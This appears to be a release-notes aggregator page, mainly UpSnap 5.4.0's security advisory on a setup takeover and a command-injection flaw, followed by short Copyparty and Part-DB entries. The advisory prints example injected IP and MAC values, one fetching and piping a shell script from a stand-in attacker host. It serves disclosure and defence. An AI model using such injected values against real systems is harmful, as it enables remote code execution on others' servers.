The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

Note

If you have sucessfully completed the initial setup in the past you are not affected.

RCE via Device IP and MAC Address Injection

GHSA-6mc7-6948-w5h4

What was the issue

UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.

In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.
Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.
HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

74633e7: fix: use token based superuser setup (@seriousm4x)
43f3f65: fix: validate ip and mac addresses to prevent RCE (@seriousm4x)

Others

dfaf0ee: build(deps-dev): bump @sveltejs/kit from 2.59.1 to 2.60.1 in /frontend (@dependabot[bot])
8b08585: build(deps-dev): bump svelte from 5.55.5 to 5.55.7 in /frontend (@dependabot[bot])
92f9e29: update deps (@seriousm4x)

v1.20.15

Copyparty

Door: 9001

26 Mei 2026 om 20:16

v1.20.15

Part-DB 2.12.0

Part-DB

Door: jbtronics

25 Mei 2026 om 23:00

Tip

If you like Part-DB, consider donating to support the development. Press the sponsor button on the main github page, for more info.

Important

If you are using Part-DB it would be helpful if you fill out this short survey on your usage of Part-DB (Google Forms): https://forms.gle/Q15twx3YYq3qCNfe8

New features

Added browser plugin to quickly submit pages from a browser to Part-DB to create parts out of it. As it submits the browser HTML, this allows also for info extraction from pages like ebay, amazon or aliexpress. Plugin is available for Chrome and Firefox
Added an "unsaved changes" warning, on when a form contains unsaved changes and user tries to navigate away (#1368)
Changed/Unsaved fields get highlighted with a light blue border in forms
The discard changes button also now correctly works with rich text editor fields and select fields.

Bug fixes

Fixed problem with attachment referencing in API (#1370)

Miscellaneous

Updated dependencies
Updated translations
Updated kicad symbols

Full Changelog: v2.11.1...v2.12.0

v1.19.5

Arcane